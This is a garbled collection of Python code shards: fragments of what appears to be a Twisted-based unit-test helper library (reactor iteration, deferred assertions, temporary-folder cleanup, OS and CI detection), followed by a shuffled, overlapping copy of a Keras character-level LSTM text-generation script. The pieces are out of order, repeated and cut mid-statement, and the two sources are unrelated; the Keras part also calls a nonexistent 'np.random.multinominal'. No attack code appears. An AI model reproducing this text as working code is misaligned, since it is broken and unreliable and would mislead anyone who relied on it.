os.environ.get('BUILDBOT', '').lower() == 'true':", "is useful if you have persistent deferred which will be", "running has consumed the startup events, so we need #", "kwargs)) def callCleanup(self): \"\"\" Call all cleanup methods. If a", "token=cls.os_user.token) cls.avatar = mk.makeFilesystemOSAvatar( name=cls.os_user.name, home_folder_path=home_folder_path, token=cls.os_user.token, ) cls.filesystem =", "an exception if `value` is not an instance of `expected_type`", "u'\\n' % ( self._reactorQueueToString(), reactor.threadCallQueue, reactor.getWriters(), reactor.getReaders(), reactor.getThreadPool().q.qsize(), self._threadPoolThreads(), self._threadPoolWorking(),", "= os.environ['LOGNAME'] if 'USER' in os.environ and 'USERNAME' not in", "normal users.''' if cls._drop_user == '-': return os.environ['USERNAME'] = cls._drop_user", "timeout = self.DEFERRED_TIMEOUT self._initiateTestReactor(timeout=timeout) # Set it to True to", "path and segments, which is auto cleaned. \"\"\" segments =", "= deferred.result self.ignoreFailure(deferred) raise AssertionError( 'Deferred contains a failure: %s'", "test_filesystem = LocalTestFilesystem(avatar=self.avatar) test_filesystem.cleanHomeFolder() class OSAccountFileSystemTestCase(FileSystemTestCase): \"\"\" Test case for", "deferred.addBoth(cb) if result: # If there is already a failure,", "reactor without stopping it. \"\"\" iterations = [False] * (count", "msg, list) self.assertSequenceEqual(first_values, second_values, msg, list) def assertSetEqual(self, first, second,", "str with unicode. \"\"\" if ( isinstance(first, text_type) and not", "for all file-system tests using a real OS account. \"\"\"", "This will do recursive calls, in case the original deferred", "'arch' if distro_name in ['centos', 'ol']: # Normalize all RHEL", "= self._teardown_errors, None if errors: raise AssertionError('Cleanup errors: %r' %", "care about it. for level in inspect.stack()[1:]: try: success_state =", "use self.patch and self.patchObject. Patch = patch _environ_user = None", "non-L{failure.Failure}. @type deferred: L{Deferred<twisted.internet.defer.Deferred>} @raise SynchronousTestCase.failureException: If the L{Deferred<twisted.internet.defer.Deferred>} has", "it. \"\"\" iterations = [False] * (count - 1) iterations.append(True)", "_UnixWaker = None _SIGCHLDWaker = None from chevah.compat import (", "created yet. \"\"\" return mk.fs.makePathInTemp(prefix=prefix, suffix=suffix) def tempPathCleanup(self, prefix='', suffix=''):", "cls.skipTest() super(FileSystemTestCase, cls).setUpClass() cls.os_user = cls.setUpTestUser() home_folder_path = system_users.getHomeFolder( username=cls.os_user.name,", "return cls._cleanFolder(segments, only_marked=True) @classmethod def _cleanFolder(cls, folder_segments, only_marked=False): \"\"\" Clean", "'') raw_name = raw_name.replace('<bound method ', '') return raw_name.split(' ',", "checker = mk.credentialsChecker() credentials = mk.credentials() deferred = checker.requestAvatarId(credentials) failure", "None def setUp(self): super(TwistedTestCase, self).setUp() self._timeout_reached = False self._reactor_timeout_failure =", "if len(threads) > 1: for thread in threads: thread_name =", "exit. \"\"\" os_name = process_capabilities.os_name os_family = process_capabilities.os_family os_version =", "which is not created yet. \"\"\" return mk.fs.makePathInTemp(prefix=prefix, suffix=suffix) def", "Exception types to expect - if provided, and the the", "target, source): \"\"\" Overwrite stdlib to swap the arguments. \"\"\"", "AssertionError('Cleanup errors: %r' % (errors,)) def _isExceptedThread(self, name): \"\"\" Return", "This should only be called at cleanup as it removes", "only_marked=False): \"\"\" Clean all test files from folder_segments. Return a", "isinstance(deferred.result, Failure): raise AssertionError('Deferred is not a failure.') def assertIsNotFailure(self,", "continue temp_members.append(member) segments = folder_segments[:] segments.append(member) if temp_filesystem.isFolder(segments): temp_filesystem.deleteFolder(segments, recursive=True)", "a result. This means that neither L{Deferred.callback<twisted.internet.defer.Deferred.callback>} nor L{Deferred.errback<twisted.internet.defer.Deferred.errback>} has", "testing. \"\"\" self._timeout_reached = False # Set up timeout. self._reactor_timeout_call", "1: t2 = 0.1 t = reactor.running and t2 reactor.doIteration(t)", "\"\"\" if not reactor: return try: reactor.removeAll() except (RuntimeError, KeyError):", "cleanup. \"\"\" kwargs['cleanup'] = self.addCleanup return mk.fs.folderInTemp(*args, **kwargs) def fileInTemp(self,", "[] else: return reactor.threadpool.threads def _threadPoolWorking(self): \"\"\" Return working thread", "is optional. _SocketWaker = None _UnixWaker = None _SIGCHLDWaker =", "= os.getenv('TEST_LANG', 'EN') # List of partial thread names to", "result. DEFERRED_TIMEOUT = 1 # List of names for delayed", "return 'arch' if distro_name in ['centos', 'ol']: # Normalize all", "self._timeout_reached = False # Set up timeout. self._reactor_timeout_call = reactor.callLater(", "is None or t2 > 1: t2 = 0.1 t", "# Test suite should be started as root and we", "'x64' return base _CI_NAMES = Bunch( LOCAL='local', GITHUB='github-actions', TRAVIS='travis', BUILDBOT='buildbot',", "be automatically removed. \"\"\" return mk.fs.pathInTemp( cleanup=self.addCleanup, prefix=prefix, suffix=suffix) def", "will not spin the reactor. # To not slow down", "only support the Windows NT family. See: https://en.wikipedia.org/wiki/Windows_NT#Releases On OSX", "'-': return os.environ['USERNAME'] = cls._drop_user os.environ['USER'] = cls._drop_user # Test", "exists. \"\"\" if not reactor.threadpool: return [] else: return reactor.threadpool.threads", "queues. Set run_once=True to only run the reactor once. This", "and 'USER' not in os.environ: os.environ['USER'] = os.environ['LOGNAME'] if 'USER'", "timeout=None, debug=False, prevent_stop=True): \"\"\" Run the reactor until callable returns", "if callback is None: return super_assertRaises(exception_class) with super_assertRaises(exception_class) as context:", "msg, list) def assertSetEqual(self, first, second, msg): super(ChevahTestCase, self).assertSetEqual(first, second,", "noqa:cover if not msg: msg = u'First is unicode while", "first stack is the # current stack and we don't", "- 1) iterations.append(True) self.executeReactorUntil( lambda _: iterations.pop(0), timeout=timeout, debug=debug) def", "output. # Otherwise the debug messages will flood the output.", "Return `True` if is OK for thread to exist after", "def exitCleanup(self): \"\"\" To be called at the end of", "Shut up you linter. TestCase else: from unittest import TestCase", "deferred.called: deferred_done = False while not deferred_done: self._iterateTestReactor(debug=debug) deferred_done =", "parts = platform.release().split('.') return 'solaris-%s' % (parts[1],) if os_name ==", "def _iterateTestReactor(self, debug=False): \"\"\" Iterate the reactor. \"\"\" reactor.runUntilCurrent() if", "= None for i in range(2, 6): try: success =", "raise AssertionError( 'executeDelayedCalls took more than %s' % (timeout,)) def", "until callable returns `True`. \"\"\" if timeout is None: timeout", "':Test') tests_start = class_name.find('.tests.') + 7 class_name = class_name[tests_start:] return", "Pool, or [] when threadpool does not exists. This should", "'EN') # List of partial thread names to ignore during", "is str for \"%s\".' % ( first,) raise AssertionError(msg.encode('utf-8')) if", "behaviour to run cleanup method before tearDown. \"\"\" self.__cleanup__.append((function, args,", "the reactor run one more time to execute the stop", "SkipTest exception.''' return SkipTest(message) @property def _caller_success_member(self): '''Retrieve the 'success'", "(ValueError, AttributeError): # AlreadyCancelled and AlreadyCalled are ValueError. # Might", "# To not slow down all the tests, we run", "= self._getDelayedCallName(delayed) is_exception = False for excepted_callback in self.EXCEPTED_DELAYED_CALLS: if", "Set it to True to enter the first loop. have_callbacks", "-*- # Copyright (c) 2011 <NAME>. # See LICENSE for", "@raise SynchronousTestCase.failureException: If the L{Deferred<twisted.internet.defer.Deferred>} has a result. \"\"\" #", "at reactor shutdown for not being handled. \"\"\" deferred.addErrback(lambda failure:", "\"\"\" return patch(*args, **kwargs) @staticmethod def patchObject(*args, **kwargs): \"\"\" Helper", "if cleanup: self.addCleanup(mk.fs.deleteFile, segments) try: opened_file = mk.fs.openFileForWriting(segments) opened_file.write(content) finally:", "method. In most tests you would like to use `getDeferredFailure`", "re-route this code after upgrading to Twisted 13.0. result =", "folder in the default temp folder and mark it for", "raise AssertionError(message.encode('utf-8')) def assertIsInstance(self, expected_type, value, msg=None): \"\"\" Raise an", "= None _UnixWaker = None _SIGCHLDWaker = None from chevah.compat", "base = platform.processor() if base == 'aarch64': return 'arm64' if", "calls, readers and writers from the reactor. This is only", "TwistedTestCase(TestCase): \"\"\" Test case for Twisted specific code. Provides support", "if have_callbacks: continue # Look at threads queue and active", "support the Windows NT family. See: https://en.wikipedia.org/wiki/Windows_NT#Releases On OSX it", "\"\"\" return time.time() @classmethod def cleanTemporaryFolder(cls): \"\"\" Clean all test", "% timeout) self._reactor_timeout_failure = failure def _initiateTestReactor(self, timeout): \"\"\" Do", "@classmethod def setUpTestUser(cls): \"\"\" Add `CREATE_TEST_USER` to local OS. \"\"\"", "return _CI_NAMES.TRAVIS if os.environ.get('INFRASTRUCTURE', '') == 'AZUREPIPELINES': return _CI_NAMES.AZURE if", "= mk.fs.getAbsoluteRealPath('.') segments = mk.fs.getSegmentsFromRealPath(path) return cls._cleanFolder(segments, only_marked=True) @classmethod def", "mk.fs.createFolderInTemp( foldername=name, prefix=prefix, suffix=suffix) path = mk.fs.getRealPathFromSegments(segments) self.addCleanup(mk.fs.deleteFolder, segments, recursive=True)", "if temp_filesystem.isFolder(segments): temp_filesystem.deleteFolder(segments, recursive=True) else: temp_filesystem.deleteFile(segments) return temp_members @classmethod def", "(path, segments) class FileSystemTestCase(ChevahTestCase): \"\"\" Common test case for all", "Usage:: protocol = mk.makeFTPProtocol() transport = mk.makeStringTransportProtocol() protocol.makeConnection(transport) transport.protocol =", "def fileInTemp(self, *args, **kwargs): \"\"\" Create a file in the", "for t in expectedExceptionTypes]) self.fail( \"Failure of type (%s) expected", "canceled from the separate thread. # AttributeError can occur when", "for delayed calls. if have_callbacks: continue if run_once: if have_callbacks:", "class_name, self._testMethodName) def assertRaises(self, exception_class, callback=None, *args, **kwargs): \"\"\" Wrapper", "Unix zone. os_name = os.uname()[0].lower() if os_name == 'darwin': parts", "def now(self): \"\"\" Return current Unix timestamp. \"\"\" return time.time()", "and removed on #: teardown. CREATE_TEST_USER = None @classmethod def", "= 0.1 t = reactor.running and t2 reactor.doIteration(t) else: #", "source. pass reactor.threadCallQueue = [] for delayed_call in reactor.getDelayedCalls(): try:", "for delayed_call in reactor.getDelayedCalls(): if delayed_call.active(): delayed_str = self._getDelayedCallName(delayed_call) if", "thread names to ignore during the tearDown. # No need", "self.assertWorkingFolderIsClean, ] errors = [] for check in checks: try:", "have a much better debug output. # Otherwise the debug", "threads', self._threadPoolThreads()) if len(reactor.getWriters()) > 0: # noqa:cover raise_failure('writers', text_type(reactor.getWriters()))", "result = deferred.result while isinstance(result, Deferred): self._executeDeferred(result, timeout=timeout, debug=debug) result", "calls. if have_callbacks: continue if run_once: if have_callbacks: raise AssertionError(", "is left unchanged. Otherwise, any L{failure.Failure} result is swallowed. @param", "if name in exception: return True if exception in name:", "isinstance(reader, reader_type): excepted = True break if not excepted: #", "success result. This means L{Deferred.callback<twisted.internet.defer.Deferred.callback>} or L{Deferred.errback<twisted.internet.defer.Deferred.errback>} has been called", "'''Retrieve the 'success' member from the test case.''' success_state =", "expected_type): raise AssertionError( \"Expecting type %s, but got %s. %s\"", "reactor.startRunning() def _iterateTestReactor(self, debug=False): \"\"\" Iterate the reactor. \"\"\" reactor.runUntilCurrent()", "def ignoreFailure(self, deferred): \"\"\" Ignore the current failure on the", "start > duration, timeout=duration + 0.1, debug=debug, prevent_stop=False, ) def", "enter the first loop. have_callbacks = True while have_callbacks and", "inspect.stack()[1:]: try: success_state = level[0].f_locals['success'] break except KeyError: success_state =", "not mk.fs.exists(folder_segments): return [] # In case we are running", "in Unix zone. os_name = os.uname()[0].lower() if os_name == 'darwin':", "t2 > 1: t2 = 0.1 t = reactor.running and", "self.ignoreFailure(deferred) raise AssertionError( 'Deferred contains a failure: %s' % (error))", "pool, or empty list when threadpool does not exists. \"\"\"", "cpu_type = process_capabilities.cpu_type ci_name = _get_ci_name() CI = _CI_NAMES TEST_LANGUAGE", "be called at teardown. \"\"\" if reactor is None: return", "is low level method. In most tests you would like", "return True return False def addCleanup(self, function, *args, **kwargs): \"\"\"", "TestCase used for Chevah project. \"\"\" from __future__ import print_function", "self.getDeferredFailure(deferred) self.assertFailureType(AuthenticationError, failure) \"\"\" self._runDeferred( deferred, timeout=timeout, debug=debug, prevent_stop=prevent_stop, )", "os.environ: os.environ['USER'] = os.environ['USERNAME'] cls._environ_user = os.environ['USER'] cls.cleanTemporaryFolder() @classmethod def", "`value` is not an instance of `expected_type` \"\"\" # In", "debug is enabled with iterate using a small delay in", "if excepted_callback in delayed_str: is_exception = True if not is_exception:", "Twisted 13 result = [] deferred.addBoth(result.append) if not result: self.fail(", "# Let the reactor know that we want to stop", "the main thread: %s - %s' % ( thread_name, threads)))", "if not is_exception: # No need to look for other", "cleanup: self.addCleanup(mk.fs.deleteFile, segments) try: opened_file = mk.fs.openFileForWriting(segments) opened_file.write(content) finally: opened_file.close()", "self.assertEqual('something', deferred.result) \"\"\" if not isinstance(deferred, Deferred): raise AssertionError('This is", "using stacked cleanups. \"\"\" self._cleanup_stack.append(self.__cleanup__) self.__cleanup__ = [] def exitCleanup(self):", "It comes by default in Python 2.7. if sys.version_info[0:2] <", "target: message = u'%s not in %s.' % (repr(source), repr(target))", "username=cls.os_user.name, token=cls.os_user.token) cls.avatar = mk.makeFilesystemOSAvatar( name=cls.os_user.name, home_folder_path=home_folder_path, token=cls.os_user.token, ) cls.filesystem", "by default DNS resolver. \"\"\" return socket.gethostname() class TwistedTestCase(TestCase): \"\"\"", "\"\"\" Does the actual deferred execution. \"\"\" if not deferred.called:", "* (count - 1) iterations.append(True) self.executeReactorUntil( lambda _: iterations.pop(0), timeout=timeout,", "not a failure.') def assertIsNotFailure(self, deferred): \"\"\" Raise assertion error", "= deferred.called if self._timeout_reached: raise AssertionError( 'Deferred took more than", "tests using a real OS account. \"\"\" @classmethod def setUpClass(cls):", "os.getpid()) result = local_wmi.query(query.encode('utf-8')) peak_working_set_size = int(result[0].PeakWorkingSetSize) # FIXME:2099: #", "None # We stop the reactor on failures. self._shutdownTestReactor() raise", "does not exists. \"\"\" if not reactor.threadpool: return [] else:", "\"found type %r instead: %s\" % ( expectedString, deferred, result[0].type,", "reactor._startedBefore = False reactor._started = False reactor._justStopped = False reactor.running", "only to clean the home folder. test_filesystem = LocalTestFilesystem(avatar=self.avatar) test_filesystem.cleanHomeFolder()", "is not the marketing name. We only support the Windows", "code which is executed from another thread. # removeAll might", "# Was already called. continue delayed_str = self._getDelayedCallName(delayed) is_exception =", "\"\"\" Run the reactor until callable returns `True`. \"\"\" if", "present. \"\"\" # FIXME:922: # Move all filesystem checks into", "key in first_keys] second_values = [second[key] for key in second_keys]", "\"\"\" Return a string representation of the delayed call. \"\"\"", "delayed_str) def _runDeferred( self, deferred, timeout=None, debug=False, prevent_stop=False): \"\"\" This", "cleanup as it removes elements from the Twisted thread queue,", "reactor._startedBefore = False reactor._started = False reactor._justStopped = False reactor.startRunning()", "): time.sleep(0.01) have_callbacks = True continue # Look at delayed", "more than %s' % (timeout,)) def executeReactorUntil( self, callable, timeout=None,", "try: function(*args, **kwargs) except Exception as error: # noqa:cover self._teardown_errors.append(error)", "class OSAccountFileSystemTestCase(FileSystemTestCase): \"\"\" Test case for tests that need a", "failure is raised. \"\"\" for function, args, kwargs in reversed(self.__cleanup__):", "has an unexpected failure result. @return: The failure result of", "Twisted support is optional. _SocketWaker = None _UnixWaker = None", "once. This is useful if you have persistent deferred which", "upgrading to Twisted 13 result = [] deferred.addBoth(result.append) if not", "== 'x86_64': return 'x64' return base _CI_NAMES = Bunch( LOCAL='local',", "self.assertIsNone(self._reactor_timeout_failure) self._assertReactorIsClean() finally: self._cleanReactor() super(TwistedTestCase, self).tearDown() def _reactorQueueToString(self): \"\"\" Return", "if provided, and the the exception wrapped by the failure", "sorted(first.keys()) second_keys = sorted(second.keys()) first_values = [first[key] for key in", "deferred.called: raise AssertionError('This deferred was not called yet.') def ignoreFailure(self,", "the separate thread. # AttributeError can occur when we do", "first loop. have_callbacks = True while have_callbacks and not self._timeout_reached:", "which were removed. \"\"\" return cls._cleanFolder(mk.fs.temp_segments) @classmethod def cleanWorkingFolder(cls): path", "return # Let the reactor know that we want to", "False reactor._started = False reactor._justStopped = False reactor.running = False", "first_values = [first[key] for key in first_keys] second_values = [second[key]", "the arguments. \"\"\" if source not in target: message =", "self.patch and self.patchObject. Patch = patch _environ_user = None _drop_user", "user = mk.makeTestUser(home_group=TEST_ACCOUNT_GROUP) os_administration.addUser(user) return user def setUp(self): super(FileSystemTestCase, self).setUp()", "tearDown. \"\"\" self.__cleanup__.append((function, args, kwargs)) def callCleanup(self): \"\"\" Call all", "def assertRaises(self, exception_class, callback=None, *args, **kwargs): \"\"\" Wrapper around the", "2.7. if sys.version_info[0:2] < (2, 7): from unittest2 import TestCase", "and it has reached the end of its callback chain", "True continue # Look at delayed calls. for delayed in", "Don't start the reactor if it is already started. #", "= reactor.running and t2 reactor.doIteration(t) else: # FIXME:4428: # When", "from nose import SkipTest try: from twisted.internet.defer import Deferred from", "thread. # removeAll might fail since it detects that internal", "C{self.failException}. @param deferred: A L{Deferred<twisted.internet.defer.Deferred>} which has a success result.", "self.assertTempIsClean, self.assertWorkingFolderIsClean, ] errors = [] for check in checks:", "True to enter the first loop. have_callbacks = True while", "%s\\n' u'threadpool working: %s\\n' u'\\n' % ( self._reactorQueueToString(), reactor.threadCallQueue, reactor.getWriters(),", "be called. \"\"\" if not reactor.threadpool: return [] result =", "second_element) def assertDictEqual(self, first, second, msg): super(ChevahTestCase, self).assertDictEqual(first, second, msg)", "or returned a L{failure.Failure}. @type deferred: L{Deferred<twisted.internet.defer.Deferred>} @param expectedExceptionTypes: Exception", "so swallow it in the deferred deferred.addErrback(lambda _: None) self.fail(", "import platform import socket import sys import time from bunch", "2.7 isInstance is already defined, but with swapped # arguments.", "that the failure will not be raised at reactor shutdown", ") self.assertIsFailure(deferred) failure = deferred.result self.ignoreFailure(deferred) return failure def successResultOf(self,", "= [] for member in (temp_filesystem.getFolderContent(folder_segments)): if only_marked and member.find(TEST_NAME_MARKER)", "in self.EXCEPTED_READERS: if isinstance(reader, reader_type): excepted = True break if", "self.executeReactorUntil( lambda _: iterations.pop(0), timeout=timeout, debug=debug) def iterateReactorWithStop(self, count=1, timeout=None,", "stdlib to make sure we don't compare str with unicode.", "# Reactor was not stopped, so stop it before raising", "reactor.getReaders(), reactor.getThreadPool().q.qsize(), self._threadPoolThreads(), self._threadPoolWorking(), ) ) t2 = reactor.timeout() #", "or \".join([ '.'.join((t.__module__, t.__name__)) for t in expectedExceptionTypes]) self.fail( \"Failure", "another deferred. Usage:: checker = mk.credentialsChecker() credentials = mk.credentials() deferred", "and 'USER' not in os.environ: os.environ['USER'] = os.environ['USERNAME'] cls._environ_user =", "\"\"\" from __future__ import print_function from __future__ import division from", "== cls._drop_user: temp_avatar = SuperAvatar() else: temp_avatar = DefaultAvatar() temp_filesystem", "marketing name. We only support the Windows NT family. See:", "one more time to execute the stop code. reactor.iterate() #", "No need for the full thread name excepted_threads = [", "\"\"\" success = None for i in range(2, 6): try:", "= [] self._teardown_errors = [] self.test_segments = None def tearDown(self):", "called at cleanup as it removes elements from the Twisted", "is not the version of the underlying Darwin OS. See:", "deferred and return the result. Usage:: checker = mk.credentialsChecker() credentials", "support for running deferred and start/stop the reactor during tests.", "home folder. test_filesystem = LocalTestFilesystem(avatar=self.avatar) test_filesystem.cleanHomeFolder() class OSAccountFileSystemTestCase(FileSystemTestCase): \"\"\" Test", "contains a failure: %s' % (error)) def _get_os_version(): \"\"\" On", "currently executed. \"\"\" if os.environ.get('BUILDBOT', '').lower() == 'true': return _CI_NAMES.BUILDBOT", "noqa:cover # Reactor was not stopped, so stop it before", "if os.environ.get('INFRASTRUCTURE', '') == 'AZUREPIPELINES': return _CI_NAMES.AZURE if os.environ.get('CI', '').lower()", "is removed. The format is customized for Chevah Nose runner.", "executing all deferred from chained callbacks. result = deferred.result while", "while second is str for \"%s\".' % ( first,) raise", "not created yet but which will be automatically removed. \"\"\"", "current success result of C{deferred} or raise C{self.failException}. @param deferred:", "self.assertIsNotFailure(deferred) self.assertEqual('something', deferred.result) \"\"\" if not isinstance(deferred, Deferred): raise AssertionError('This", "= cls._drop_user # Test suite should be started as root", "cls.setUpTestUser() home_folder_path = system_users.getHomeFolder( username=cls.os_user.name, token=cls.os_user.token) cls.avatar = mk.makeFilesystemOSAvatar( name=cls.os_user.name,", "None @classmethod def setUpTestUser(cls): \"\"\" Add `CREATE_TEST_USER` to local OS.", "result of C{deferred}. \"\"\" # FIXME:1370: # Remove / re-route" ]
[ "def generate(self): unique_id = ( ((int(time.time() * 1000) - self.epoch)", "1000) - self.epoch) & 0x1FFFFFFFFFF) << 22 | (self.machine_id &", "= 0 self.serial_no = init_serial_no def generate(self): unique_id = (", "self.serial_no = init_serial_no def generate(self): unique_id = ( ((int(time.time() *", "import time class Snowflake: def __init__(self, init_serial_no=0): self.machine_id = 0", "class Snowflake: def __init__(self, init_serial_no=0): self.machine_id = 0 self.epoch =", "= init_serial_no def generate(self): unique_id = ( ((int(time.time() * 1000)", "= 0 self.epoch = 0 self.serial_no = init_serial_no def generate(self):", "* 1000) - self.epoch) & 0x1FFFFFFFFFF) << 22 | (self.machine_id", "& 0x1FFFFFFFFFF) << 22 | (self.machine_id & 0x3FF) << 12", "(self.machine_id & 0x3FF) << 12 | (self.serial_no & 0xFFF) )", "unique_id = ( ((int(time.time() * 1000) - self.epoch) & 0x1FFFFFFFFFF)", "- self.epoch) & 0x1FFFFFFFFFF) << 22 | (self.machine_id & 0x3FF)", "22 | (self.machine_id & 0x3FF) << 12 | (self.serial_no &", "12 | (self.serial_no & 0xFFF) ) self.serial_no += 1 return", "self.machine_id = 0 self.epoch = 0 self.serial_no = init_serial_no def", "<gh_stars>0 import time class Snowflake: def __init__(self, init_serial_no=0): self.machine_id =", "& 0x3FF) << 12 | (self.serial_no & 0xFFF) ) self.serial_no", "__init__(self, init_serial_no=0): self.machine_id = 0 self.epoch = 0 self.serial_no =", "def __init__(self, init_serial_no=0): self.machine_id = 0 self.epoch = 0 self.serial_no", "init_serial_no=0): self.machine_id = 0 self.epoch = 0 self.serial_no = init_serial_no", "((int(time.time() * 1000) - self.epoch) & 0x1FFFFFFFFFF) << 22 |", "0 self.serial_no = init_serial_no def generate(self): unique_id = ( ((int(time.time()", "0x1FFFFFFFFFF) << 22 | (self.machine_id & 0x3FF) << 12 |", "| (self.serial_no & 0xFFF) ) self.serial_no += 1 return unique_id", "time class Snowflake: def __init__(self, init_serial_no=0): self.machine_id = 0 self.epoch", "self.epoch = 0 self.serial_no = init_serial_no def generate(self): unique_id =", "( ((int(time.time() * 1000) - self.epoch) & 0x1FFFFFFFFFF) << 22", "self.epoch) & 0x1FFFFFFFFFF) << 22 | (self.machine_id & 0x3FF) <<", "<< 12 | (self.serial_no & 0xFFF) ) self.serial_no += 1", "init_serial_no def generate(self): unique_id = ( ((int(time.time() * 1000) -", "0 self.epoch = 0 self.serial_no = init_serial_no def generate(self): unique_id", "0x3FF) << 12 | (self.serial_no & 0xFFF) ) self.serial_no +=", "| (self.machine_id & 0x3FF) << 12 | (self.serial_no & 0xFFF)", "Snowflake: def __init__(self, init_serial_no=0): self.machine_id = 0 self.epoch = 0", "<< 22 | (self.machine_id & 0x3FF) << 12 | (self.serial_no", "= ( ((int(time.time() * 1000) - self.epoch) & 0x1FFFFFFFFFF) <<", "generate(self): unique_id = ( ((int(time.time() * 1000) - self.epoch) &" ]
[]
[ "Text-generation loop import sys import random # Trains the model", "temperature exp_preds = np.exp(preds) preds = exp_preds / np.sum(exp_preds) probas", "1) generated_text = text[start_index: start_index + maxlen] print(f'--- Generating with", "character preds = model.predict(sampled, verbose=0)[0] next_index = sample(preds, temperature) next_char", "temperatures for temperature in [0.2, 0.5, 1.0, 1.2]: print(f'--- Temperature", "predictions def sample(preds, temperature=1.0): preds = np.asarray(preds).astype('float64') preds = np.log(preds)", "random # Trains the model for 60 epochs for epoch", "= np.zeros((1, maxlen, len(chars))) for t, char in enumerate(generated_text): sampled[0,", "import layers # Single-layer LSTM model for next-character prediction model", "verbose=0)[0] next_index = sample(preds, temperature) next_char = chars[next_index] generated_text +=", "np.asarray(preds).astype('float64') preds = np.log(preds) / temperature exp_preds = np.exp(preds) preds", "text seed at random start_index = random.randint(0, len(text) - maxlen", "for next-character prediction model = keras.models.Sequential() model.add(layers.LSTM(128, input_shape=(maxlen, len(chars)))) model.add(layers.Dense(len(chars),", "for temperature in [0.2, 0.5, 1.0, 1.2]: print(f'--- Temperature {temperature}", "char_indices[char]] = 1. # Samples the next character preds =", "layers # Single-layer LSTM model for next-character prediction model =", "np.argmax(probas) # Text-generation loop import sys import random # Trains", "model.compile(loss='categorical_crossentropy', optimizer=optimizer) # Function to sample the next character given", "model’s predictions def sample(preds, temperature=1.0): preds = np.asarray(preds).astype('float64') preds =", "= np.asarray(preds).astype('float64') preds = np.log(preds) / temperature exp_preds = np.exp(preds)", "60 epochs for epoch in range(1, 60): print(f'Epoch: {epoch}') model.fit(x,", "random.randint(0, len(text) - maxlen - 1) generated_text = text[start_index: start_index", "= model.predict(sampled, verbose=0)[0] next_index = sample(preds, temperature) next_char = chars[next_index]", "---') sys.stdout.write(generated_text) # Generates 400 characters, starting from the seed", "np.sum(exp_preds) probas = np.random.multinominal(1, preds, 1) return np.argmax(probas) # Text-generation", "of different sampling temperatures for temperature in [0.2, 0.5, 1.0,", "next-character prediction model = keras.models.Sequential() model.add(layers.LSTM(128, input_shape=(maxlen, len(chars)))) model.add(layers.Dense(len(chars), activation='softmax'))", "start_index = random.randint(0, len(text) - maxlen - 1) generated_text =", "400 characters, starting from the seed text for i in", "1. # Samples the next character preds = model.predict(sampled, verbose=0)[0]", "[0.2, 0.5, 1.0, 1.2]: print(f'--- Temperature {temperature} ---') sys.stdout.write(generated_text) #", "seed: {generated_text} ---') # Tries a range of different sampling", "from the seed text for i in range(400): sampled =", "= exp_preds / np.sum(exp_preds) probas = np.random.multinominal(1, preds, 1) return", "+ maxlen] print(f'--- Generating with seed: {generated_text} ---') # Tries", "Generates 400 characters, starting from the seed text for i", "60): print(f'Epoch: {epoch}') model.fit(x, y, batch_size=128, epochs=1) # Selects a", "= keras.optimizers.RMSprop(lr=0.01) model.compile(loss='categorical_crossentropy', optimizer=optimizer) # Function to sample the next", "= np.random.multinominal(1, preds, 1) return np.argmax(probas) # Text-generation loop import", "= text[start_index: start_index + maxlen] print(f'--- Generating with seed: {generated_text}", "probas = np.random.multinominal(1, preds, 1) return np.argmax(probas) # Text-generation loop", "model for 60 epochs for epoch in range(1, 60): print(f'Epoch:", "compilation configuration optimizer = keras.optimizers.RMSprop(lr=0.01) model.compile(loss='categorical_crossentropy', optimizer=optimizer) # Function to", "preds = np.log(preds) / temperature exp_preds = np.exp(preds) preds =", "seed text for i in range(400): sampled = np.zeros((1, maxlen,", "configuration optimizer = keras.optimizers.RMSprop(lr=0.01) model.compile(loss='categorical_crossentropy', optimizer=optimizer) # Function to sample", "preds = model.predict(sampled, verbose=0)[0] next_index = sample(preds, temperature) next_char =", "character given the model’s predictions def sample(preds, temperature=1.0): preds =", "model = keras.models.Sequential() model.add(layers.LSTM(128, input_shape=(maxlen, len(chars)))) model.add(layers.Dense(len(chars), activation='softmax')) # Model", "preds, 1) return np.argmax(probas) # Text-generation loop import sys import", "{epoch}') model.fit(x, y, batch_size=128, epochs=1) # Selects a text seed", "exp_preds / np.sum(exp_preds) probas = np.random.multinominal(1, preds, 1) return np.argmax(probas)", "a text seed at random start_index = random.randint(0, len(text) -", "the seed text for i in range(400): sampled = np.zeros((1,", "t, char_indices[char]] = 1. # Samples the next character preds", "sys.stdout.write(generated_text) # Generates 400 characters, starting from the seed text", "for epoch in range(1, 60): print(f'Epoch: {epoch}') model.fit(x, y, batch_size=128,", "next_index = sample(preds, temperature) next_char = chars[next_index] generated_text += next_char", "the next character preds = model.predict(sampled, verbose=0)[0] next_index = sample(preds,", "optimizer=optimizer) # Function to sample the next character given the", "= sample(preds, temperature) next_char = chars[next_index] generated_text += next_char generated_text", "Single-layer LSTM model for next-character prediction model = keras.models.Sequential() model.add(layers.LSTM(128,", "def sample(preds, temperature=1.0): preds = np.asarray(preds).astype('float64') preds = np.log(preds) /", "sampling temperatures for temperature in [0.2, 0.5, 1.0, 1.2]: print(f'---", "import sys import random # Trains the model for 60", "activation='softmax')) # Model compilation configuration optimizer = keras.optimizers.RMSprop(lr=0.01) model.compile(loss='categorical_crossentropy', optimizer=optimizer)", "sample the next character given the model’s predictions def sample(preds,", "temperature=1.0): preds = np.asarray(preds).astype('float64') preds = np.log(preds) / temperature exp_preds", "for i in range(400): sampled = np.zeros((1, maxlen, len(chars))) for", "len(text) - maxlen - 1) generated_text = text[start_index: start_index +", "= keras.models.Sequential() model.add(layers.LSTM(128, input_shape=(maxlen, len(chars)))) model.add(layers.Dense(len(chars), activation='softmax')) # Model compilation", "seed at random start_index = random.randint(0, len(text) - maxlen -", "in [0.2, 0.5, 1.0, 1.2]: print(f'--- Temperature {temperature} ---') sys.stdout.write(generated_text)", "sampled[0, t, char_indices[char]] = 1. # Samples the next character", "epochs for epoch in range(1, 60): print(f'Epoch: {epoch}') model.fit(x, y,", "Function to sample the next character given the model’s predictions", "return np.argmax(probas) # Text-generation loop import sys import random #", "1.0, 1.2]: print(f'--- Temperature {temperature} ---') sys.stdout.write(generated_text) # Generates 400", "print(f'--- Generating with seed: {generated_text} ---') # Tries a range", "1.2]: print(f'--- Temperature {temperature} ---') sys.stdout.write(generated_text) # Generates 400 characters,", "range(400): sampled = np.zeros((1, maxlen, len(chars))) for t, char in", "different sampling temperatures for temperature in [0.2, 0.5, 1.0, 1.2]:", "= 1. # Samples the next character preds = model.predict(sampled,", "0.5, 1.0, 1.2]: print(f'--- Temperature {temperature} ---') sys.stdout.write(generated_text) # Generates", "= np.log(preds) / temperature exp_preds = np.exp(preds) preds = exp_preds", "{temperature} ---') sys.stdout.write(generated_text) # Generates 400 characters, starting from the", "prediction model = keras.models.Sequential() 